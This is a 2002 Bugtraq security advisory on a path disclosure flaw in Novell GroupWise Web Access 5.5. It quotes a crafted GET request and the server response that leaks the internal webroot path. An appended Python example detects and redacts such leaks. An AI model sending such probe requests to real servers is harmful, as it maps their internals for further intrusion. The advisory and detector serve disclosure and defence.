[24462] in bugtraq
SecurityOffice Security Advisory:// Novell GroupWise Web Access Path Disclosure Vulnerability
daemon@ATHENA.MIT.EDU (Tamer Sahin)
Fri Mar 1 00:30:05 2002
Message-ID: <000901c1bfe6$d75b9050$788f83d9@ts>
Reply-To: "Tamer Sahin" <ts@securityoffice.net>
From: "Tamer Sahin" <ts@securityoffice.net>
To: <bugtraq@securityfocus.com>
Date: Thu, 28 Feb 2002 01:31:10 +0200
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Novell GroupWise Web Access Path Disclosure Vulnerability
Type:
Input Validation Error
Release Date:
February 28, 2002
Product / Vendor:
Novell GroupWise, the premier communication and collaboration tool
for the one Net environment, helps you tackle some of the toughest
business challenges you face. Whether your organization is small,
midsize or large, your employees need e-mail, calendaring, document
management and other collaborative tools to open up the lines of
communication and keep your business running efficiently.
http://www.novell.com/products/groupwise/
Summary:
If an attacker submits a web request containing unexpected arguments
for script variables, an error message is displayed that contains
the path to the webroot directory of the server running GroupWise
Web Access.
Exploit:
GET /cgi-bin/GW5/GWWEB.EXE?GET-CONTEXT&HTMLVER=AAA HTTP/1.0

HTTP/1.1 200 Document Follows
Date: Wed, 27 Feb 2002 22:27:08 GMT
Server:
MIME-version: 1.0
Content-type: text/html
Connection: close

Could not find file
SYS:\NOVONYX\SUITES~1\CGI-BIN\GW5\US\AAA\LOGIN.HTM
Tested:
Netware Enterprise Web Server 5.1 / GroupWise Web Access 5.5
Vulnerable:
GroupWise Web Access 5.5 (and possibly others)
Disclaimer:
http://www.securityoffice.net is not responsible for the misuse or
illegal use of any of the information and/or the software listed on
this security advisory.
Author:
Tamer Sahin
ts@securityoffice.net
http://www.securityoffice.net
PGP Key ID: 0x2B5EDCB0
-----BEGIN PGP SIGNATURE-----
Version: PGP 7.1
iQA/AwUBPH1sPLuLpFMrXtywEQJzlgCfTn8RnbkHJDYUkbt28B4gT58Jpp4AoMzT
SQKOfafzkyXrQUMO9bw80DMN
=w9Rd
-----END PGP SIGNATURE-----
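
An added example, not part of the original advisory and not Novell code: a response check that a reverse proxy or monitoring job could run to catch this kind of leak and strip it before it reaches the client. The function names, the path regex and the "[path removed]" marker are assumptions; the sample request and response are the ones quoted in the advisory, with headers abridged and the blank line between headers and body restored.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Absolute path with a NetWare volume or DOS drive prefix, e.g. SYS:\DIR\FILE.HTM
PATH_RE = re.compile(r"\b[A-Za-z][A-Za-z0-9_]{0,14}:\\[^\s<>\"']+")

# Request line and response from the advisory (headers abridged, header/body
# separator restored so the message parses as HTTP).
SAMPLE_REQUEST = "GET /cgi-bin/GW5/GWWEB.EXE?GET-CONTEXT&HTMLVER=AAA HTTP/1.0"
SAMPLE_RESPONSE = (
    "HTTP/1.1 200 Document Follows\r\n"
    "Date: Wed, 27 Feb 2002 22:27:08 GMT\r\n"
    "Content-type: text/html\r\n"
    "Connection: close\r\n"
    "\r\n"
    "Could not find file\r\n"
    "SYS:\\NOVONYX\\SUITES~1\\CGI-BIN\\GW5\\US\\AAA\\LOGIN.HTM\r\n"
)

def split_response(raw):
    """Return (status_code, body) from a raw HTTP response string."""
    head, _, body = raw.partition("\r\n\r\n")
    status_line = head.split("\r\n", 1)[0]
    return int(status_line.split()[1]), body

def leaked_paths(body):
    """Absolute server-side paths that appear in the response body."""
    return PATH_RE.findall(body)

def reflected_params(request_line, path):
    """Names of query parameters whose value shows up as a path component."""
    target = request_line.split()[1]
    parts = {p.upper() for p in path.split("\\")}
    return [k for k, v in parse_qsl(urlsplit(target).query) if v.upper() in parts]

def redact(body):
    """Replace each leaked path with a fixed marker before it leaves the proxy."""
    return PATH_RE.sub("[path removed]", body)

def audit(request_line, raw_response):
    # The error page is served with status 200, so the check keys on the body.
    status, body = split_response(raw_response)
    paths = leaked_paths(body)
    names = sorted({n for p in paths for n in reflected_params(request_line, p)})
    return {"status": status, "paths": paths, "reflected": names,
            "clean_body": redact(body)}

if __name__ == "__main__":
    print(audit(SAMPLE_REQUEST, SAMPLE_RESPONSE))
```

The "reflected" field names the request parameter whose value ended up inside the disclosed path, which points at the input that needs validating on the server side.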